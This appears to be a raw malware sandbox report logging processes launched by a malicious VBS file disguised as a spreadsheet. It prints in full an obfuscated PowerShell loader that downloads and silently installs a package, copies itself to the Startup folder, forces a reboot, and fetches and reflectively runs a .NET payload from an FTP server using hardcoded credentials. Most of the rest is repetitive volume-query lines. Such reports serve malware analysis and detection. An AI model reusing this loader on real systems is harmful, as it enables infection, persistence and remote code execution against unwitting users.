                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$qkkzc = 'owb9' + [char]65 + 'ds' + [char]65 + 'kq' + [char]65 + 'g' + [char]65 + 'ck' + [char]65 + 'i' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'eq' + [char]65 + 'r' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'eq' + [char]65 + 'jw' + [char]65 + 'g' + [char]65 + 'cw' + [char]65 + 'i' + [char]65 + 'by' + [char]65 + 'f' + [char]65 + '' + [char]65 + 'vqb1' + [char]65 + 'gg' + [char]65 + 'j' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'cw' + [char]65 + 'i' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'gg' + [char]65 + 'd' + [char]65 + 'b0' + [char]65 + 'h' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'c8' + [char]65 + 'lwb3' + [char]65 + 'hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'gc' + [char]65 + 'cgbh' + [char]65 + 'hq' + [char]65 + 'aqb0' + [char]65 + 'hu' + [char]65 + 'z' + [char]65 + 'bl' + [char]65 + 'hm' + [char]65 + 'zqbl' + [char]65 + 'gs' + [char]65 + 'zqby' + [char]65 + 'hm' + [char]65 + 'lgbj' + [char]65 + 'g8' + [char]65 + 'bq' + [char]65 + 'v' + [char]65 + 'hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'gk' + [char]65 + 'bgbj' + [char]65 + 'gw' + [char]65 + 'dqbk' + [char]65 + 'gu' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'gm' + [char]65 + 'dqbz' + [char]65 + 'hq' + [char]65 + 'bwbt' + [char]65 + 'gk' + [char]65 + 'egbl' + [char]65 + 'c8' + [char]65 + 'ywbz' + [char]65 + 'hm' + [char]65 + 'lwbi' + [char]65 + 'gq' + [char]65 + 'lgb0' + [char]65 + 'hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'k' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'f0' + [char]65 + 'xqbb' + [char]65 + 'hq' + [char]65 + 'ywbl' + [char]65 + 'go' + [char]65 + 'ygbv' + [char]65 + 'fs' + [char]65 + 'i' + [char]65 + '' + [char]65 + 's' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'b' + [char]65 + 'bs' + [char]65 + 'hu' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'bl' + [char]65 + 'gs' + [char]65 + 'bwb2' + [char]65 + 'g4' + [char]65 + 'sq' + [char]65 + 'u' + [char]65 + 'ck' + [char]65 + 'i' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'ek' + [char]65 + 'vgbg' + [char]65 + 'hi' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'bk' + [char]65 + 'g8' + [char]65 + 'a' + [char]65 + 'b0' + [char]65 + 'gu' + [char]65 + 'tqb0' + [char]65 + 'gu' + [char]65 + 'rw' + [char]65 + 'u' + [char]65 + 'ck' + [char]65 + 'jw' + [char]65 + 'x' + [char]65 + 'hm' + [char]65 + 'cwbh' + [char]65 + 'gw' + [char]65 + 'qw' + [char]65 + 'u' + [char]65 + 'dm' + [char]65 + 'eqby' + [char]65 + 'ge' + [char]65 + 'cgbi' + [char]65 + 'gk' + [char]65 + 't' + [char]65 + 'bz' + [char]65 + 'hm' + [char]65 + 'yqbs' + [char]65 + 'em' + [char]65 + 'jw' + [char]65 + 'o' + [char]65 + 'gu' + [char]65 + 'c' + [char]65 + 'b5' + [char]65 + 'fq' + [ch
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "; $jwral = $host.version.major.equals(2) ;if ( $jwral ) {$uvhrt = [system.io.path]::gettemppath();del ( $uvhrt + '\upwin.msu' );$faqoi = 'https://drive.google.com/uc?export=download&id=';$jwemr = $env:processor_architecture.contains('64') ;if ( $jwemr ) {$faqoi = ($faqoi + '1naqdnxigvi_q1rpkazftmygmaqtjxu42') ;}else {$faqoi = ($faqoi + '1g1jmxusx9mc9vmhvrjj2xofz3ak_clot') ;};$yfepp = (new-object net.webclient);$yfepp.encoding = [system.text.encoding]::utf8;$yfepp.downloadfile($urlkb, $uvhrt + '\upwin.msu');$mynkz = ('c:\users\' + [environment]::username );riwcg = ($uvhrt + '\upwin.msu'); powershell.exe wusa.exe riwcg /quiet /norestart ; copy-item 'c:\users\user\desktop\skmbt_77122012816310td0128_17311_xls.vbs' -destination ( $mynkz + '\appdata\roaming\microsoft\windows\start menu\programs\startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true};[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$lbczsg;$mjdqf = (new-object net.webclient);$mjdqf.encoding = [system.text.encoding]::utf8;$mjdqf.credentials = new-object system.net.networkcredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578jp@@');$lbczsg = $mjdqf.downloadstring( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/upcrypter/01/dll01.txt' );$mjdqf.dispose();$mjdqf = (new-object net.webclient);$mjdqf.encoding = [system.text.encoding]::utf8;$lbczsg = $mjdqf.downloadstring( $lbczsg );$huupx = 'c:\users\user\desktop\skmbt_77122012816310td0128_17311_xls.vbs';[byte[]] $acbcz = [system.convert]::frombase64string( $lbczsg.replace( '?:?' , 'a' ) );[system.appdomain]::currentdomain.load( $acbcz ).gettype('classlibrary3.class1').getmethod( 'prfvi' ).invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huupx , 'd dd' ) );};"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$qkkzc = 'owb9' + [char]65 + 'ds' + [char]65 + 'kq' + [char]65 + 'g' + [char]65 + 'ck' + [char]65 + 'i' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'eq' + [char]65 + 'r' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'eq' + [char]65 + 'jw' + [char]65 + 'g' + [char]65 + 'cw' + [char]65 + 'i' + [char]65 + 'by' + [char]65 + 'f' + [char]65 + '' + [char]65 + 'vqb1' + [char]65 + 'gg' + [char]65 + 'j' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'cw' + [char]65 + 'i' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'gg' + [char]65 + 'd' + [char]65 + 'b0' + [char]65 + 'h' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'c8' + [char]65 + 'lwb3' + [char]65 + 'hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'gc' + [char]65 + 'cgbh' + [char]65 + 'hq' + [char]65 + 'aqb0' + [char]65 + 'hu' + [char]65 + 'z' + [char]65 + 'bl' + [char]65 + 'hm' + [char]65 + 'zqbl' + [char]65 + 'gs' + [char]65 + 'zqby' + [char]65 + 'hm' + [char]65 + 'lgbj' + [char]65 + 'g8' + [char]65 + 'bq' + [char]65 + 'v' + [char]65 + 'hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'gk' + [char]65 + 'bgbj' + [char]65 + 'gw' + [char]65 + 'dqbk' + [char]65 + 'gu' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'gm' + [char]65 + 'dqbz' + [char]65 + 'hq' + [char]65 + 'bwbt' + [char]65 + 'gk' + [char]65 + 'egbl' + [char]65 + 'c8' + [char]65 + 'ywbz' + [char]65 + 'hm' + [char]65 + 'lwbi' + [char]65 + 'gq' + [char]65 + 'lgb0' + [char]65 + 'hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'k' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'f0' + [char]65 + 'xqbb' + [char]65 + 'hq' + [char]65 + 'ywbl' + [char]65 + 'go' + [char]65 + 'ygbv' + [char]65 + 'fs' + [char]65 + 'i' + [char]65 + '' + [char]65 + 's' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'b' + [char]65 + 'bs' + [char]65 + 'hu' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'bl' + [char]65 + 'gs' + [char]65 + 'bwb2' + [char]65 + 'g4' + [char]65 + 'sq' + [char]65 + 'u' + [char]65 + 'ck' + [char]65 + 'i' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'ek' + [char]65 + 'vgbg' + [char]65 + 'hi' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'bk' + [char]65 + 'g8' + [char]65 + 'a' + [char]65 + 'b0' + [char]65 + 'gu' + [char]65 + 'tqb0' + [char]65 + 'gu' + [char]65 + 'rw' + [char]65 + 'u' + [char]65 + 'ck' + [char]65 + 'jw' + [char]65 + 'x' + [char]65 + 'hm' + [char]65 + 'cwbh' + [char]65 + 'gw' + [char]65 + 'qw' + [char]65 + 'u' + [char]65 + 'dm' + [char]65 + 'eqby' + [char]65 + 'ge' + [char]65 + 'cgbi' + [char]65 + 'gk' + [char]65 + 't' + [char]65 + 'bz' + [char]65 + 'hm' + [char]65 + 'yqbs' + [char]65 + 'em' + [char]65 + 'jw' + [char]65 + 'o' + [char]65 + 'gu' + [char]65 + 'c' + [char]65 + 'b5' + [char]65 + 'fq' + [chJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "; $jwral = $host.version.major.equals(2) ;if ( $jwral ) {$uvhrt = [system.io.path]::gettemppath();del ( $uvhrt + '\upwin.msu' );$faqoi = 'https://drive.google.com/uc?export=download&id=';$jwemr = $env:processor_architecture.contains('64') ;if ( $jwemr ) {$faqoi = ($faqoi + '1naqdnxigvi_q1rpkazftmygmaqtjxu42') ;}else {$faqoi = ($faqoi + '1g1jmxusx9mc9vmhvrjj2xofz3ak_clot') ;};$yfepp = (new-object net.webclient);$yfepp.encoding = [system.text.encoding]::utf8;$yfepp.downloadfile($urlkb, $uvhrt + '\upwin.msu');$mynkz = ('c:\users\' + [environment]::username );riwcg = ($uvhrt + '\upwin.msu'); powershell.exe wusa.exe riwcg /quiet /norestart ; copy-item 'c:\users\user\desktop\skmbt_77122012816310td0128_17311_xls.vbs' -destination ( $mynkz + '\appdata\roaming\microsoft\windows\start menu\programs\startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true};[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$lbczsg;$mjdqf = (new-object net.webclient);$mjdqf.encoding = [system.text.encoding]::utf8;$mjdqf.credentials = new-object system.net.networkcredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578jp@@');$lbczsg = $mjdqf.downloadstring( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/upcrypter/01/dll01.txt' );$mjdqf.dispose();$mjdqf = (new-object net.webclient);$mjdqf.encoding = [system.text.encoding]::utf8;$lbczsg = $mjdqf.downloadstring( $lbczsg );$huupx = 'c:\users\user\desktop\skmbt_77122012816310td0128_17311_xls.vbs';[byte[]] $acbcz = [system.convert]::frombase64string( $lbczsg.replace( '?:?' , 'a' ) );[system.appdomain]::currentdomain.load( $acbcz ).gettype('classlibrary3.class1').getmethod( 'prfvi' ).invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huupx , 'd dd' ) );};"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00434CB6 cpuid 20_2_00434CB6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,20_2_0045201B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,20_2_004520B6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,20_2_00452143
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,20_2_00452393
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,20_2_00448484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,20_2_004524BC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,20_2_004525C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,20_2_00452690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,20_2_0044896D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,20_2_0040F90C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,20_2_00451D58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,20_2_00451FD0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
